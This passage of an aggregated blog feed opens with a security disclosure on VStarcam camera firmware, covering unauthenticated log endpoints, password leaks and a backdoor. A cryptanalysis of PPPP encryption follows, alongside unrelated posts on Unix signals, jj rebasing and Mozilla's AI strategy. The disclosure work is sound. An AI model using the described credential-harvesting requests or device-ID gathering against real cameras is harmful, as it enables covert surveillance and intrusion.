The calls explicitly excluded from authentication differ by firmware version but are for example: get_online_log.cgi, show_prodhwfg.cgi, ircut_test.cgi, clear_log.cgi, alexa_ctrl.cgi, server_auth.cgi. For most of these it isn’t obvious why they should be accessible to unauthenticated users. But get_online_log.cgi caught my attention in particular.
Unauthenticated log accessSo a request like GET /get_online_log.cgi?enable=1 can be sent to a camera without any authentication. This isn’t a request that any of the VStarcam apps seem to support, what does it do?
Despite the name this isn’t a download request, it rather sets a flag for the current connection. The logic behind this involves many moving parts including a Linux kernel module but the essence is this: whenever the application logs something via LogSystem_WriteLog function, the application won’t merely print that to stderr and write it to the log file on the SD card but also send it to any connection that has this flag set.
What does the application log? Lots and lots of stuff. On average, VStarcam firmware has around 1500 such logging calls. For example, it could log security tokens:
LogSystem_WriteLog("qiniu.c", "upload_qiniu", 497, 0, "upload_qiniu*** filename = %s, fileid = %s, uptoken = %s\n", …); LogSystem_WriteLog("pushservice.c", "parsePushServerRequest_cjson", 5281, 1, "address=%s token =%s master= %d timestamp = %d", …); LogSystem_WriteLog("queue.c", "CloudUp_Manage_Pth", 347, 2, "token=%s", …);It could log cloud server responses:
LogSystem_WriteLog("pushservice.c", "curlPostMqttAuthCb", 4407, 3, "\n\nrspBuf = %s\n", …); LogSystem_WriteLog("post/postFileToCloud.c", "curl_post_file_cb", 74, 0, "\n\nrspBuf = %s\n", …); LogSystem_WriteLog("pushserver.c", "curl_Eye4Authentication_write_data_cb", 2822, 0, "rspBuf = %s", …);And of course it will log the requests coming in via PPPP:
LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0, "sit %d, pcmd: %s", …);Reminder: these requests contain the authentication password as parameter. So an attacker can connect to a vulnerable device, request logs and wait for the legitimate device owner to connect. Once they do their password will show up in the logs – voila, the attacker has access now.
VStarcam appears to be at least somewhat aware of this issue because some firmware versions contain code “censoring” password parameters prior to logging:
memcpy(pcmd, request, sizeof(pcmd)); char* pos = strstr(pcmd, "loginuse"); if (pos) *pos = 0; LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0, "sit %d, pcmd: %s", sit, pcmd);But that’s only the beginning of the story of course.
Explicit password leaking via logsIn addition to the logging calls where the password leaks as a (possibly unintended) side-effect, some logging calls are specifically designed to write the device password to the log. For example, the function GetUserPri meant to handle authentication when dual authentication isn’t enabled will often do something like this on a failed login attempt:
LogSystem_WriteLog("sysparamapp.c", "GetUserPri", 177, 0, "loginuse=%s&loginpas=%s&user=admin&pwd=888888&", gUser, gPassword);These aren’t the parameters of a received login attempt but rather what the parameters should look like for the request to succeed. And if the attacker enabled log access for their connection they will get the device credentials handed on a silver platter – without even having to wait for the device owner to connect.
If dual authentication is enabled, function GetUserPri_doubleVerify often contains a similar call:
LogSystem_WriteLog("web.c", "GetUserPri_doubleVerify", 536, 0, "pri[%d] system OwnerPwd[%s] app Pwd[%s]", pri, gOwnerPassword, gAppPassword); Log uploadingWhat got me confused at first were the firmware versions that would log the “correct” password on failed authentication attempts but lacked the capability for unauthenticated log access. When I looked closer I found the function DoSendLogToNodeServer. The firmware receives a “node configuration” from a server which includes a “push IP” and the corresponding port number. It then opens a persistent TCP connection to that address (unencrypted of course), so that DoSendLogToNodeServer can send messages to it.
Despite the name this function doesn’t upload all of the application logs. There are only three to four DoSendLogToNodeServer calls in the firmware versions I looked at, and two are invariably found in function P2pCgiParamFunction, in code running on first failed authentication attempt:
sprintf(buffer,"password error [doublePwd][%s], [PassWd][%s]", gOwnerPassword, gPassword); DoSendLogToNodeServer(request); DoSendLogToNodeServer(buffer);This is sending both the failed authentication request and the correct passwords to a VStarcam server. So while the password isn’t being leaked here to everybody who knows how to ask, it’s still being leaked to VStarcam themselves. And anybody who is eavesdropping on the device’s traffic of course.
A few firmware versions have log upload functionality in a function called startUploadLogToServer, here really all logging output is being uploaded to the server. This one isn’t called unconditionally however but rather enabled by the setLogUploadEnable.cgi endpoint. An endpoint which, you guessed it, can be accessed without authentication. But at least these firmware versions don’t seem to have any explicit password logging, only the “regular” logging of requests.
Password-leaking backdoorWith some considerable effort all of the above could be explained as debugging functionality which was mistakenly shipped to production. VStarcam wouldn’t be the first company to fail realizing that functionality labeled “for debugging purposes only” will still be abused if released with the production build of their software. But I found yet another password leak which can only be described as a backdoor.
At some point VStarcam introduced a second version of their get_online_log.cgi API. When that second version is requested the device will respond with something like:
result=0; index=12345678; str=abababababab;The result=0 part is typical and indicates that authentication (or lack thereof in this case) was successful. The other two values are unusual, and eventually I decided to check what they were about. Turned out, str is a hex-encoded version of the device password after it was XOR’ed with a random byte. And index is an obfuscated representation of that byte.
I can only explain it like this: somebody at VStarcam thought that leaking passwords via log output was too obvious, people might notice. So they decided to expose the device password in a more subtle way, one that only they knew how to decode (unless somebody notices this functionality and spends two minutes studying it in the firmware).
Mind you, even though this is clearly a backdoor I’m still not ruling out incompetence. Maybe VStarcam made a large enough mess with their dual authentication that their customer support needs to recover device access on a regular basis. However, they do have device reset functionality that should normally be used for this scenario.
In the end, for their customers it doesn’t matter what the intention was. The result is a device that cannot be trusted with protecting access. For a security camera this is an unforgivable flaw.
Establishing a timelineNow we are coming to the tough questions. Why do some firmware versions have this backdoor functionality while others don’t? When was this introduced? In what order? What is the current state of affairs?
You might think that after compiling the data on 367 firmware versions the answers would be obvious. But the data is so inconsistent that any conclusions are really difficult. Thing is, we aren’t dealing with a single evolving codebase here. We aren’t even dealing with two codebases or a dozen of them. 367 firmware versions are 367 different codebases. These codebases are related, they share some code here and there, but they are all being developed independently.
I’ve seen this development model before. What VStarcam appears to be doing is: for every new camera model they take some existing firmware and fork it. They adjust that firmware for the new hardware, they probably add new features as well. None of this work makes it into the original firmware unless it is explicitly backported. And since VStarcam is maintaining hundreds of firmware variants, the older ones are usually only receiving maintenance changes if any at all.
To make this mess complete, VStarcam’s firmware version numbers don’t make any sense at all. And I don’t mean the fact that VStarcam releases the same camera under 30 different model names, so there is no chance of figuring out the model to firmware version mapping. It’s also the firmware version numbers themselves.
As I’ve already mentioned, the last part of the firmware version is the build number, increased with each release. The first part is the vendor ID: firmware versions starting with 48 are VStarcam’s global releases whereas 66 is reserved for their Russian distributor (or rather was I think). Current VStarcam firmware is usually released with vendor ID 10 however, standing for… who knows, VeePai maybe? This leaves the two version parts in between, and I couldn’t find any logic here whatsoever. Like, firmware versions sharing the third part of the version number would sometimes be closely related, but only sometimes. At the same time the second part of the version number is supposed to represent the camera model, but that’s clearly not always correct either.
I ended up extracting all the logging calls from all the firmware versions and using that data to calculate a distance between every firmware version pair. I then fed this data into GraphViz and asked it to arrange the graph for me. It gave me the VStarcam spiral galaxy:
Click the image above to see the larger and slightly interactive version (it shows additional information when the mouse pointer is at a graph node). The green nodes are the ones that don’t allow access to device logs. Yellow are the ones providing unauthenticated log access, always logging incoming requests including their password parameters. The orange ones have additional logging that exposes the correct password on failed authentication attempts – or they call DoSendLogToNodeServer function to send the correct password to a VStarcam server. The red ones have the backdoor in the get_online_log.cgi API leaking passwords. Finally pink are the ones which pretend to improve things by censoring parameters of logged requests – yet all of these without exception leak the password via the backdoor in the get_online_log.cgi API.
Note: Firmware version 10.165.19.37 isn’t present in the graph because it is somehow based on an entirely different codebase with no relation to the others. It would be red in the graph however, as the backdoor has been implemented here as well.
Not only does this graph show the firmware versions as clusters, it’s also possible to approximately identify the direction of time for each cluster. Let’s add cluster names and time arrows to the image:
Of course this isn’t a perfect representation of the original data, and I wasn’t sure whether it could be trusted. Are these clusters real or merely an artifact produced by the graph algorithm? I verified things manually and could confirm that the clusters are in fact distinctly different on the technical level, particularly when considering updates format:
- Clusters A and B represent firmware for ARM processors. I’m unsure what caused the gap between the two clusters but cluster A contains firmware from years 2019 and 2020, cluster B on the other hand is mostly years 2021 and 2022. Development pretty much stopped here, the only exception being the four red firmware versions which are recent. Updates use the “classic” ZIP format here.
- Cluster C covers years 2019 to 2022. Quite remarkably, in these years the firmware from this cluster moved from ARM processors and LiteOS to MIPS processors and Linux. The original updates based on VStarcam Pack System were replaced by the VeePai-branded ZIP format and later by Ingenic updates with LZO compression. All that happened without introducing significant changes to the code but rather via incremental development.
- Cluster D contains firmware for the MIPS processors from years 2022 and 2023. Updates are using the VeePai-branded ZIP format.
- Cluster E formed around 2023, there is still some development being done here. It uses MIPS processors like cluster D, yet the update format is different (what I called VeePai updates in my previous blog post).
- Cluster F has seen continuous development since approximately 2022, this is firmware based on Ingenic’s MIPS hardware and the most active branch of VStarcam development. Originally the VeePai-branded ZIP format was used for updates, this was later transitioned to Ingenic updates with LZO compression and finally to the same format with jzlcma compression.
With the firmware versions ordered like this I could finally make some conclusions about the introduction of the problematic features:
- Unauthenticated logs access via the get_online_log.cgi API was introduced in cluster B around 2022.
- Logging the correct password on failed attempts was introduced independently in cluster C. In fact, some firmware versions had this in 2020 already.
- In 2021 cluster C also added the innovation that was DoSendLogToNodeServer function, sending the correct password to a VStarcam server on first failed login attempt.
- Unauthenticated logs access and logging the correct password appear to have been combined in cluster D in 2023.
- Cluster E initially also adopted the approach of exposing log access and logging device password on failed attempts, adding the sending of the correct password to a VStarcam server to the mix. However, starting in 2024 firmware versions with the get_online_log.cgi backdoor start popping up here, and these have all other password leaks removed. These even censor passwords in logged request parameters. Either there were security considerations at play or the other ways to expose the password were considered unnecessary at this point and too obvious.
- Cluster F also introduced logging device password on failed attempts around 2023. This cluster appears to be the origin of the get_online_log.cgi backdoor, it was introduced here around 2024. Unlike with cluster E this backdoor didn’t replace the existing password leaks here but only complemented them. In fact, while cluster F was initially “censoring” parameters so that logged requests wouldn’t leak passwords, this measure appears to have been dropped later in 2024. Current cluster F firmware tends to have all the issues described in this post simultaneously. Whatever security considerations may have driven the changes in cluster E, the people in charge of cluster F clearly disagreed.
So, how bad is it? Knowing the access password allows access to the camera’s main functionality: audio and video recordings. But these cameras have been known for vulnerabilities allowing execution of arbitrary commands. Also, newer cameras have an API that will start a telnet server with hardcoded and widely known administrator credentials (older cameras had this telnet server start by default). So we have to assume that a compromised camera could become part of a botnet or be used as a starting point for attacks against a network.
But this requires accessing the camera first, and most VStarcam cameras won’t be exposed to the internet directly. They will only be reachable via the PPPP protocol. And for that the attackers would need to know the device ID. How would they get it?
There is a number of ways, most of which I’ve already discussed before. For example, anybody who was briefly connected to your network could have collected device IDs of your cameras. The script to do that won’t currently work with newer VStarcam cameras because these obfuscate the traffic on the PPPP level but the necessary adjustments aren’t exactly complicated.
PPPP networks still support “supernodes,” devices that help route traffic. Back in 2019 Paul Marrapese abused that functionality to register a rogue supernode and collect device IDs en masse. There is no indication that this trick stopped working, and the VStarcam networks are likely susceptible as well.
Users also tend to leak their device IDs themselves. They will post screenshots or videos of the app’s user interface. On the first glance this is less problematic with the O-KAM Pro app because this one will display only a vendor-specific device ID (looks similar to a PPPP device ID but has seven digits and only four letters in the verification code). That is, until you notice that the app uses a public web API to translate vendor-specific device IDs into PPPP device IDs.
Anybody who can intercept some PPPP traffic can extract the device IDs from it. Even when VStarcam networks obfuscate the traffic rather than using plaintext transmission – the static keys are well known, removing the obfuscation isn’t hard.
And finally, simply guessing device IDs is still possible. With only 5 million possible verification codes for each device IDs and servers not implementing rate limiting, bruteforce attacks are quite realistic.
Let’s not forget the elephant in the room however: VStarcam themselves know all the device IDs of course. Not just that, they know which devices are active and where. With a password they can access the cameras of interest to them (or their government) anytime.
Coordinated disclosure attemptGiven the intentional nature of these issues, I was unsure how to deal with this. I mean, what’s the point of reporting vulnerabilities to VStarcam that they are clearly aware of? In the end I decided to give them a chance to address the issues before they become public knowledge.
However, all I found was VStarcam boasting about their ISO 27001:2022 compliance. My understanding is that this requires them to have a dedicated person responsible for vulnerability management, but they are not obliged to list any security contact that can be reached from outside the company – and so they don’t. I ended up emailing all company addresses I could find, asking whether there is any way to report security issues to them.
I haven’t received any response, an experience that in my understanding other people already made with VStarcam. So I went with my initial publication schedule rather than waiting 90 days as I would normally do.
RecommendationsWhatever motives VStarcam had to backdoor their cameras, the consequence for the customers is: these cameras cannot be trusted. Their access protection should be considered compromised. Even with firmware versions shown as green on my map, there is no guarantee that I haven’t missed something or that these will still be green after the next update.
If you want to keep using a VStarcam camera, the only safe way to do it is disconnecting it from the internet. They don’t have to be disconnected physically, internet routers will often have a way to prohibit internet traffic to and from particular devices. My router for example has this feature under parental control.
Of course this will mean that you will only be able to control your camera while connected to the same network. It might be possible to explicitly configure port forwarding for the camera’s RTSP port, allowing you to access at least the video stream from outside. Just make sure that your RTSP password isn’t known to VStarcam.
Olivier Mehani: Pausing a background process
It’s common, in a Unix shell, to pause a foreground process with Ctrl+Z. However, today I needed to pause a _background_ process.
tl;dr: SIGTSTP and SIGCONT
The context was a queue processor spinning too fast, and preventing us from dequeuing unwanted messages.
Unsurprisingly, there are standard POSIX signals to pause and resume a target PID.
So we just need to grab the PID, and kill away.
$ kill -TSTP ${PID} [... do what's needed ...] $ kill -TCONT ${PID}EDIT: because some curious people asked the question I didn’t: TSTP stands for “Terminal Stop”, which is apparently exactly what Ctrl+z from a terminal sends to the foreground process.
The post Pausing a background process first appeared on Narf.
Jonathan Almeida: Rebase all WIPs to the new main
A small pet-peeve with fetching the latest main on jujutsu is that I like to move all my WIP patches to the new one. That's also nice because jj doesn't make me fix the conflicts immediately!
The solution from a co-worker (kudos to skippyhammond!) is to query all immediate decendants of the previous main after the fetch.
jj git fetch # assuming 'z' is the rev-id of the previous main. jj rebase -s "mutable()&z+" -d mainI haven't learnt how to make aliases accept params with it yet, so this will have to do for now.
Update: After a bit of searching, it seems that today this is only possible by wrapping it in a shell script. Based on the examples in the jj documentation an alias would look like this:
[aliases] # Update all revs to the latest main; point to the previous one. hoist = ["util", "exec", "--", "bash", "-c", """ set -euo pipefail jj rebase -s "mutable()&$1+" -d "main" """, ""]Wladimir Palant: Analysis of PPPP “encryption”
My first article on the PPPP protocol already said everything there was to say about PPPP “encryption”:
- Keys are static and usually trivial to extract from the app.
- No matter how long the original key, it is mapped to an effective key that’s merely four bytes long.
- The “encryption” is extremely susceptible to known-plaintext attacks, usually allowing reconstruction of the effective key from a single encrypted packet.
So this thing is completely broken, why look any further? There is at least one situation where you don’t know the app being used so you cannot extract the key and you don’t have any traffic to analyze either. It’s when you are trying to scan your local network for potential hidden cameras.
This script will currently only work for cameras using plaintext communication. Other cameras expect a properly encrypted “LAN search” packet and will ignore everything else. How can this be solved without listing all possible keys in the script? By sending all possible ciphertexts of course!
TL;DR: What would be completely ridiculous with any reasonable protocol turned out to be quite possible with PPPP. There are at most 157,092 ways in which a “LAN search” packet can be encrypted. I’ve opened a pull request to have the PPPP device detection script adjusted.
Note: Cryptanalysis isn’t my topic, I am by no means an expert here. These issues are simply too obvious.
Contents- Mapping keys to effective keys
- Redundancies within the effective key
- ASCII to the rescue
- How large is n?
- How many ciphertexts is that?
- Understanding the response
The key which is specified as part of the app’s “init string” is not being used for encryption directly. Nor is it being fed into any of the established key stretching algorithms. Instead, a key represented by the byte sequence <semantics>b1,b2,…,bn<annotation encoding="application/x-tex">b_1, b_2, \ldots, b_n</annotation></semantics> is mapped to four bytes <semantics>k1,k2,k3,k4<annotation encoding="application/x-tex">k_1, k_2, k_3, k_4</annotation></semantics> that become the effective key. These bytes are calculated as follows (<semantics>⌊x⌋<annotation encoding="application/x-tex">\lfloor x \rfloor</annotation></semantics> means rounding down, <semantics>⊗<annotation encoding="application/x-tex">\otimes</annotation></semantics> stands for the bitwise XOR operation):
<semantics>k1=(b1+b2+…+bn)mod 256k2=(−b1+−b2+…+−bn)mod 256k3=(⌊b1÷3⌋+⌊b2÷3⌋+…+⌊bn÷3⌋)mod 256k4=b1⊗b2⊗…⊗bn<annotation encoding="application/x-tex"> \begin{aligned} k_1 &= (b_1 + b_2 + \ldots + b_n) \mod 256\\ k_2 &= (-b_1 + -b_2 + \ldots + -b_n) \mod 256\\ k_3 &= (\lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor) \mod 256\\ k_4 &= b_1 \otimes b_2 \otimes \ldots \otimes b_n \end{aligned} </annotation></semantics>In theory, a 4 byte long effective key means <semantics>2564=4,294,967,296<annotation encoding="application/x-tex">256^4 = 4{,}294{,}967{,}296</annotation></semantics> possible values. But that would only be the case if these bytes were independent of each other.
Redundancies within the effective keyOf course the bytes of the effective key are not independent. This is most obvious with <semantics>k2<annotation encoding="application/x-tex">k_2</annotation></semantics> which is completely determined by <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics>:
<semantics>k2=(−b1+−b2+…+−bn)mod 256=−(b1+b2+…+bn)mod 256=−k1mod 256<annotation encoding="application/x-tex"> \begin{aligned} k_2 &= (-b_1 + -b_2 + \ldots + -b_n) \mod 256\\ &= -(b_1 + b_2 + \ldots + b_n) \mod 256\\ &= -k_1 \mod 256 \end{aligned} </annotation></semantics>This means that we can ignore <semantics>k2<annotation encoding="application/x-tex">k_2</annotation></semantics>, bringing the number of possible effective keys down to <semantics>2563=16,777,216<annotation encoding="application/x-tex">256^3 = 16{,}777{,}216</annotation></semantics>.
Now let’s have a look at the relationship between <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics> and <semantics>k4<annotation encoding="application/x-tex">k_4</annotation></semantics>. Addition and bitwise XOR operations are very similar, the latter merely ignores carry. This difference affects all the bits of the result but the lowest one, no carry to be considered here. This means that the lowest bits of <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics> and <semantics>k4<annotation encoding="application/x-tex">k_4</annotation></semantics> are always identical. So <semantics>k4<annotation encoding="application/x-tex">k_4</annotation></semantics> has only 128 possible values for any value of <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics>, bringing the total number of effective keys down to <semantics>256⋅256⋅128=8,388,608<annotation encoding="application/x-tex">256 \cdot 256 \cdot 128 = 8{,}388{,}608</annotation></semantics>.
And that’s how far we can get considering only redundancies. It can be shown that a key can be constructed resulting in any combination of <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics> and <semantics>k3<annotation encoding="application/x-tex">k_3</annotation></semantics> values. Similarly, it can be shown that any combination of <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics> and <semantics>k4<annotation encoding="application/x-tex">k_4</annotation></semantics> is possible as long as the lowest bit is identical.
ASCII to the rescueBut the keys we are dealing with here aren’t arbitrary bytes. These aren’t limited to alphanumeric characters, some keys also contain punctuation, but they are all invariably limited to the ASCII range. And that means that the highest bit is never set in any of the <semantics>bi<annotation encoding="application/x-tex">b_i</annotation></semantics> values.
Which in turn means that the highest bit is never set in <semantics>k4<annotation encoding="application/x-tex">k_4</annotation></semantics> due to the nature of the bitwise XOR operation. We can once again rule out half of the effective keys, for any given value of <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics> there are only 64 possible values of <semantics>k4<annotation encoding="application/x-tex">k_4</annotation></semantics>. We now have <semantics>256⋅256⋅64=4,194,304<annotation encoding="application/x-tex">256 \cdot 256 \cdot 64 = 4{,}194{,}304</annotation></semantics> possible effective keys.
How large is n?Now let’s have a thorough look at how <semantics>k3<annotation encoding="application/x-tex">k_3</annotation></semantics> relates to <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics>, ignoring the modulo operation at first. We are taking one third of each byte, rounding it down and summing that up. What if we were to sum up first and round down at the end, how would that relate? Well, it definitely cannot be smaller than rounding down in each step, so we have an upper bound here.
<semantics>⌊b1÷3⌋+⌊b2÷3⌋+…+⌊bn÷3⌋≤⌊(b1+b2+…+bn)÷3⌋<annotation encoding="application/x-tex"> \lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor \leq \lfloor (b_1 + b_2 + \ldots + b_n) \div 3 \rfloor </annotation></semantics>How much smaller can the left side get? Each time we round down this removes at most two thirds, and we do this <semantics>n<annotation encoding="application/x-tex">n</annotation></semantics> times. So altogether these rounding operations reduce the result by at most <semantics>n⋅2÷3<annotation encoding="application/x-tex">n \cdot 2 \div 3</annotation></semantics>. This gives us a lower bound:
<semantics>⌈(b1+b2+…+bn−n⋅2)÷3⌉≤⌊b1÷3⌋+⌊b2÷3⌋+…+⌊bn÷3⌋<annotation encoding="application/x-tex"> \lceil (b_1 + b_2 + \ldots + b_n - n \cdot 2) \div 3 \rceil \leq \lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor </annotation></semantics>If <semantics>n<annotation encoding="application/x-tex">n</annotation></semantics> is arbitrary these bounds don’t help us at all. But <semantics>n<annotation encoding="application/x-tex">n</annotation></semantics> isn’t arbitrary, the keys used for PPPP encryption tend to be fairly short. Let’s say that we are dealing with keys of length 16 at most which is a safe bet. If we know the sum of the bytes these bounds allow us to narrow down <semantics>k3<annotation encoding="application/x-tex">k_3</annotation></semantics> to <semantics>⌈16⋅2÷3⌉=11<annotation encoding="application/x-tex">\lceil 16 \cdot 2 \div 3 \rceil = 11</annotation></semantics> possible values.
But we don’t know the sum of bytes. What we have is <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics> which is that sum modulo 256, and the sum is actually <semantics>i⋅256+k1<annotation encoding="application/x-tex">i \cdot 256 + k_1</annotation></semantics> where <semantics>i<annotation encoding="application/x-tex">i</annotation></semantics> is some nonnegative integer. How large can <semantics>i<annotation encoding="application/x-tex">i</annotation></semantics> get? Remembering that we are dealing with ASCII keys, each byte has at most the value 127. And we have at most 16 bytes. So the sum of bytes cannot be higher than <semantics>127⋅16=2032<annotation encoding="application/x-tex">127 \cdot 16 = 2032</annotation></semantics> (or 7F0 in hexadecimal). Consequently, <semantics>i<annotation encoding="application/x-tex">i</annotation></semantics> is 7 at most.
Let’s write down the bounds for <semantics>k3<annotation encoding="application/x-tex">k_3</annotation></semantics> now:
<semantics>⌈(i⋅256+k1−n⋅2)÷3⌉≤j⋅256+k3≤⌊(i⋅256+k1)÷3⌋<annotation encoding="application/x-tex"> \lceil (i \cdot 256 + k_1 - n \cdot 2) \div 3 \rceil \leq j \cdot 256 + k_3 \leq \lfloor (i \cdot 256 + k_1) \div 3 \rfloor </annotation></semantics>We have to consider this for eight possible values of <semantics>i<annotation encoding="application/x-tex">i</annotation></semantics>. Wait, do we really?
Once we move into modulo 256 space again, the <semantics>i⋅256÷3<annotation encoding="application/x-tex">i \cdot 256 \div 3</annotation></semantics> part of our bounds (which is the only part dependent on <semantics>i<annotation encoding="application/x-tex">i</annotation></semantics>) will assume the same value after every three <semantics>i<annotation encoding="application/x-tex">i</annotation></semantics> values. So only three values of <semantics>i<annotation encoding="application/x-tex">i</annotation></semantics> are really relevant, say 0, 1 and 2. Meaning that for each value of <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics> we have <semantics>3⋅11=33<annotation encoding="application/x-tex">3 \cdot 11 = 33</annotation></semantics> possible values for <semantics>k3<annotation encoding="application/x-tex">k_3</annotation></semantics>.
This gives us <semantics>256⋅33⋅64=540,672<annotation encoding="application/x-tex">256 \cdot 33 \cdot 64 = 540{,}672</annotation></semantics> as the number of possible effective keys. My experiments with random keys indicate that this should be pretty much as far down as it goes. There may still be more edge conditions rendering some effective keys impossible, but if these exist their impact is insignificant.
Not all effective keys are equally likely however, the <semantics>k3<annotation encoding="application/x-tex">k_3</annotation></semantics> values at the outer edges of the possible range are very unlikely. So one could prioritize the keys by probability – if the total number weren’t already low enough to render this exercise moot.
How many ciphertexts is that?We have the four byte plaintext F1 30 00 00 and we have 540,672 possible effective keys. How many ciphertexts does this translate to? With any reasonable encryption scheme the answer would be: slightly less than 540,672 due to a few unlikely collisions which could occur here.
But PPPP doesn’t use a reasonable encryption scheme. With merely four bytes of plaintext there is a significant chance that PPPP will only use part of the effective key for encryption, resulting in identical ciphertexts for every key sharing that part. I didn’t bother analyzing this possibility mathematically, my script simply generated all possible ciphertexts. So the exact answer is: 540,672 effective keys produce 157,092 ciphertexts.
And that’s why you should leave cryptography to experts.
Understanding the responseNow let’s say we send 157,092 encrypted requests. An encrypted response comes back. How do we decrypt it without knowing which of the requests was accepted?
All PPPP packets start with the magic byte F1, so the first byte of our response’s plaintext must be F1 as well. The “encryption” scheme used by PPPP allows translating that knowledge directly into the value of <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics>. Now one could probably (definitely) guess more plaintext parts and with some clever tricks deduce the rest of the effective key. But there are only <semantics>33⋅64=2,112<annotation encoding="application/x-tex">33 \cdot 64 = 2{,}112</annotation></semantics> possible effective keys for each value of <semantics>k1<annotation encoding="application/x-tex">k_1</annotation></semantics> anyway. It’s much easier to simply try out all 2,112 possibilities and see which one results in a response that makes sense.
The response here is 24 bytes large, making ambiguous decryptions less likely. Still, my experiments show that in approximately 4% of the cases closely related keys will produce valid but different decryption results. So you will get two or more similar device IDs and any one of them could be correct. I don’t think that this ambiguity can be resolved without further communication with the device, but at least with my changes the script reliably detects when a PPPP device is present on the network.
Firefox wordt een AI-browser, maar Mozilla belooft ‘uitknop’ voor wie dat niet wil - Clickx
Firefox wordt een AI-browser, maar Mozilla belooft ‘uitknop’ voor wie dat niet wil - Clickx
Rewiring Mozilla: Doing for AI what we did for the web
AI isn’t just another tech trend — it’s at the heart of most apps, tools and technology we use today. It enables remarkable things: new ways to create and collaborate and communicate. But AI is also letting us down, filling the internet with slop, creating huge social and economic risks — and further concentrating power over how tech works in the hands of a few.
This leaves us with a choice: push the trajectory of AI in a direction that’s good for humanity — or just let the slop pour out and the monopolies grow. For Mozilla, the choice is clear. We choose humanity.
Mozilla has always been focused on making the internet a better place. Which is why pushing AI in a different direction than it’s currently headed is the core focus of our strategy right now. As AI becomes a fundamental component of everything digital — everything people build on the internet — it’s imperative that we step in to shape where it goes.
This post is the first in a series that will lay out Mozilla’s evolving strategy to do for AI what we did for the web.
What did we do for the web?Twenty five years ago, Microsoft Internet Explorer had 95% browser market share — controlling how most people saw the internet, and who could build what and on what terms. Mozilla was born to change this. Firefox challenged Microsoft’s monopoly control of the web, and dropped Internet Explorer’s market share to 55% in just a few short years.
The result was a very different internet. For most people, the internet was different because Firefox made it faster and richer — and blocked the annoying pop up ads that were pervasive at the time. It did even more for developers: Firefox was a rocketship for the growth of open standards and open source, decentralizing who controlled the technology used to build things on the internet. This ushered in the web 2.0 era.
How did Mozilla do this? By building a non-profit tech company around the values in the Mozilla Manifesto — values like privacy, openness and trust. And by gathering a global community of tens of thousands — a rebel alliance of sorts — to build an alternative to the big tech behemoth of the time.
What does success look like?This is what we intend to do again: grow an alliance of people, communities, companies who envision — and want to build — a different future for AI.
What does ‘different’ look like? There are millions of good answers to this question. If your native tongue isn’t a major internet language like English or Chinese, it might be AI that has nuance in the language you speak. If you are a developer or a startup, it might be having open source AI building blocks that are affordable, flexible and let you truly own what you create. And if you are, well, anyone, it’s probably apps and services that become more useful and delightful as they add AI — and that are genuinely trustworthy and respectful of who we are as humans. The common threads: agency, diversity, choice.
Our task is to create a future for AI that is built around these values. We’ve started to rewire Mozilla to take on this task — and developed a new strategy focused just as much on AI as it is on the web. At the heart of this strategy is a double bottom line framework — a way to measure our progress against both mission and money:
Double bottom lineIn the worldIn MozillaMissionEmpower people with tech that promotes agency and choice – make AI for and about people. Build AI that puts humanity first.100% of Mozilla orgs building AI that advances the Mozilla Manifesto.MoneyDecentralize the tech industry – and create an tech ecosystem where the ‘people part’ of AI can flourish. Radically diversify our revenue. 20% yearly growth in non-search revenue. 3+ companies with $25M+ revenue.
Mozilla has always had an implicit double bottom line. The strategy we developed this year makes this double bottom line explicit — and ties it back to making AI more open and trustworthy. Over the next three years, all of the organizations in Mozilla’s portfolio will design their strategies — and measure their success — against this double bottom line.
What will we build?As we’ve rewired Mozilla, we’ve not only laid out a new strategy — we have also brought in new leaders and expanded our portfolio of responsible tech companies. This puts us on a strong footing. The next step is the most important one: building new things — real technology and products and services that start to carve a different path for AI.
While it is still early days, all of the organizations across Mozilla are well underway with this piece of the puzzle. Each is focused on at least one of three areas of focus in our strategy:
Open source AI— for developersPublic interest AI
— by and for communitiesTrusted AI experiences
— for everyone Focus: grow a decentralized open source AI ecosystem that matches the capabilities of Big AI — and that enables people everywhere to build with AI on their own terms.Focus: work with communities everywhere to build technology that reflects their vision of who AI and tech should work, especially where the market won’t build it for them.Focus: create trusted AI-driven products that give people new ways to interact with the web — with user choice and openness as guiding principles.Early examples: Mozilla.ai’s Choice First Stack, a unified open-source stack that simplifies building and testing modern AI agents. Also, llamafile for local AI.Early examples: the Mozilla Data Collective, home to Common Voice, which makes it possible to train and tune AI models in 300+ languages, accents and dialects. Early examples: recent Firefox AI experiments, which will evolve into AI Window in early 2026 — offering an opt-in way to choose models and add AI features in a browser you trust.
The classic versions of Firefox and Thunderbird are still at the heart of what Mozilla does. These remain our biggest areas of investment — and neither of these products will force you to use AI. At the same time, you will see much more from Mozilla on the AI front in coming years. And, you will see us invest in other double bottom line companies trying to point AI in a better direction.
We need to do this — togetherThese are the stakes: if we can’t push AI in a better direction, the internet — a place where 6 billion of us now spend much of our lives — will get much much worse. If we want to shape the future of the web and the internet, we also need to shape the future of AI.
For Mozilla, whether or not to tackle this challenge isn’t a question anymore. We need to do this. The question is: how? The high level strategy that I’ve laid out is our answer. It doesn’t prescribe all the details — but it does give us a direction to point ourselves and our resources. Of course, we know there is still a HUGE amount to figure out as we build things — and we know that we can’t do this alone.
Which means it’s incredibly important to figure out: who can we walk beside? Who are our allies? The there is a growing community of people who believe the internet is alive and well — and who are dedicating themselves to bending the future of AI to keep it that way. They may not all use the same words or be building exactly the same thing, but a rebel alliance of sorts is gathering. Mozilla sees itself as part of this alliance. Our plan is to work with as many of you as possible. And to help the alliance grow — and win — just as we did in the web era.
